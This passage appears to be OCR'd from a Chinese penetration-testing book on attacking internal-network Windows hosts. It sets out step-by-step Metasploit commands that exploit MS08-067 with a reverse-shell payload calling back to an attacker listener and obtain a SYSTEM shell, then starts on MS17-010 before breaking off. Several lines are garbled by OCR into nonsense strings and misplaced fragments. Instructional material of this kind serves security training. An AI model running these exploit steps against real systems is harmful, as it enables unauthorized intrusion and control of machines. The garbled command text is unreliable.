内网常见攻击操作系统漏洞，操作系统是管理和控制计算机硬件与软件资源的计算机程序，是直接运行在“裸 机”上的最基本的系统软件，任何其他软件都必须在操作系统的支持下才能运行。操作系 统漏洞指的是计算机操作系统本身所存在的问题或技术缺陷，操作系统漏洞会影响到个人 电脑终端、服务器等。

大家应该都知道，在对内网的攻击中，除了收集资产和针对Web系统进行攻击外， 还会对内网终端系统的漏洞进行攻击，如经典的MS08-067和MS17-010漏洞等。当然除 了这些可以直接进行攻击的漏洞外，还有以对远程登录端口进行弱口令暴力破解的方式进行攻击。

众所周知，很多的终端因为本身在内网中，认为是比较安全的或者是不能上网且无 法自动更新补丁的，导致不能及时更新系统漏洞补丁，这种情况在内网中是很普遍的。不 过在内网中弱口令更是一个十分大的隐患，如123456、11111及姓名拼音等应该都是在 内网终端中非常常见的，而且很多的终端使用者为了操作方便直接使用的是空密码，对于 这种情况通常会使用一些暴力破解工具进行检测，如果获取到一个弱口令，那么下一步的 攻击会变得简单许多。对此，在这一节挑选了MS08-067和MS17-010这两个经典的操作 系统漏洞进行介绍的演示。

MS08-067 漏洞是很经典的远程溢出漏洞，下面来介绍下如何使用 MSF 利用此漏 洞。首先运行“search 08-067”命令搜索 MS08-067 漏洞利用模块，然后运行命令“use exploit/windows/smb/ms08_067_netapi"并使用漏洞利用模块"exploit/windows/smb/ms08 067 netapi”，并运行命令“set RHOST 10.211.55.22”对其进行配置，使用漏洞利用模块。

运行命令“show options”查看所需配置。运行命令“set payload generic/shell reverse top”选择 Payload,如图8-2所示，再运WinParlent with isenerit/ shell运行命令“set LHOST 10.211.55.21”和“set target 3”配置监听主机及目标，然后运 高的System权限。 行命令“run”并开始攻击，发现攻击成功，如图8-3所示，得到了一个Shell,获得了Startedreverse ICP handler on 10.211.55.211 4444 10.211.55.72.445 Attersoting to visser the wiser stuty攻击成功。

MS17-010 漏洞是著名的远程溢出漏洞，下面通过 MSF 演示如何利用此漏洞。首 先，运行命令“ search 17-010”搜索 MS17-010 漏洞利用模块，然后运行命令“use exploit/windows/smb/ms17_010_psexec"并使用漏洞利用模块"exploit/windows/smb/ ms17_010_psexec",选择攻击模块。